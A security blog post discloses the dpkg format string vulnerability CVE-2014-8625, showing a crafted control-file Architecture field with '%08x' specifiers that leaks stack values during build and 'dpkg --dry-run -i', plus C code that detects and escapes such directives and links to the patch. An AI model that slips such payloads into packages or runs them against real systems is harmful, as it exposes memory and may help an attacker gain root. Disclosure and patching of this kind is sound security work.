Just Another Security/Programming Blog: `dpkg' format string vulnerability. CVE-2014-8625

Monday, 10 November 2014

`dpkg' format string vulnerability. CVE-2014-8625

A few days ago, I found a strange/stupid vulnerability in dpkg.

Dpkg is the package manager for Debian-based operating systems, such as Ubuntu.
It handles .deb files.

When creating a dpkg package (a .deb file), a 'control file' must be written. It holds information about the package, such as its name, description, maintainer(s), and version.

That control file is used to display the information before the package is installed.

I found that in the "Architecture" field of the control file you could put format specifiers, such as %s, %d, etc., and dpkg would print out the stack pointer.

For my control file, I have this:

Package: backup
Architecture: %08x.%08x.%08x.%08x.%08x\n
Description: Stuff
maintainer: Joshua Rogers
Version: 1


When building the package, I receive this warning:

dpkg-deb: warning: parsing file 'folder//DEBIAN/control' near line 2 package 'backup:01485120.00415cf8.00000001.00000001.0000001c\n':
 '%08x.%08x.%08x.%08x.%08x\n
Description: Stuff

[....]
01485120 and 00415cf8 are the stack pointers.

The notable thing is that dpkg-deb still builds the package despite the warning.
So we have a working .deb file with this bug in it (available here: https://internot.info/docs/folder.deb).

Now that we have a working .deb file, processing it will trigger the vulnerability.

Even when using dpkg's '--dry-run' flag, which isn't supposed to change anything:

       --no-act, --dry-run, --simulate
              Do everything which is supposed to be done, but don't write any changes. This is used to see what would happen with the specified action, without actually modifying anything.

the vulnerability still triggers.

Since "dpkg --dry-run -i" has to be run as root, you could probably root a system using this.

# dpkg --dry-run -i folder.deb
dpkg: warning: parsing file '/tmp/dpkg.XuLMM7/control' near line 2 package 'backup:01e143c0.00431828.00000001.00000001.0000001c\n':
 '%08x.%08x.%08x.%08x.%08x\n
Description: Stuff
maintainer: Joshua Rogers
[.....]



The attack vector is narrow, because normally people download .deb files in order to install them, and a .deb file you install could just as well contain a trojan or something along those lines (tl;dr: don't install random .deb files you find).
But if you're in the habit of analyzing .deb files you find, this may be harmful.

The vulnerable function, parse_error_msg([...]), is called from many more code paths than just -i.
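As an added illustration (my own hypothetical helpers, not dpkg's code and not the patch itself), here is a check that flags control-file field values carrying printf directives, next to the two ways of neutralising them: escaping '%' as the patch title describes, and keeping the value out of the format string altogether. The sample value is the Architecture line from the control file above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample: the Architecture value from the control file above
 * (the characters '\' and 'n' are literal there, as in the post). */
static const char *SAMPLE_ARCH = "%08x.%08x.%08x.%08x.%08x\\n";

/* Detection check (hypothetical helper): does a control-file field value
 * contain a '%' that a printf-style function would treat as a conversion?
 * "%%" is a literal percent sign and is not flagged. */
int has_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }  /* "%%" is a literal '%' */
        return 1;   /* "%08x", "%s", "%n", or a trailing '%' */
    }
    return 0;
}

/* Mitigation 1, the approach named in the patch title: escape every '%'
 * as "%%" so the value can be spliced into a format string safely.
 * The caller frees the result. */
char *escape_percent(const char *s)
{
    size_t n = 0;
    for (const char *p = s; *p; p++)
        n += (*p == '%') ? 2 : 1;
    char *out = malloc(n + 1);
    if (!out)
        return NULL;
    char *o = out;
    for (; *s; s++) {
        *o++ = *s;
        if (*s == '%')
            *o++ = '%';
    }
    *o = '\0';
    return out;
}

/* Mitigation 2, preferred: keep data out of the format string entirely and
 * pass it through %s, so the bytes are copied verbatim, never interpreted. */
int build_warning(char *buf, size_t len, const char *pkg, const char *arch)
{
    return snprintf(buf, len, "parsing control file: package '%s:%s'", pkg, arch);
}
```

With build_warning, the sample value comes back in the message byte for byte, which is what the dpkg warnings above should have shown instead of stack contents.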



The bug was assigned the CVE-ID: CVE-2014-8625.
Original bug report: https://bugs.launchpad.net/ubuntu/+source/dpkg/+bug/1389135
Debian bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=768485

8 comments:

  1. What did you mean by "stack info"?
    What is that?

    1. Sorry, I meant the stack pointer.
      I'll fix that up.

  2. Dude, please share the vulnerable source code.

    1. Show the code where the vulnerability exists.

    2. Patch is here: https://internot.info/docs/0001-libdpkg-Escape-package-and-architecture-on-control-f.patch
      Source (unpatched as I write this) here: http://anonscm.debian.org/cgit/dpkg/dpkg.git/tree/lib/dpkg/parsehelp.c#n40
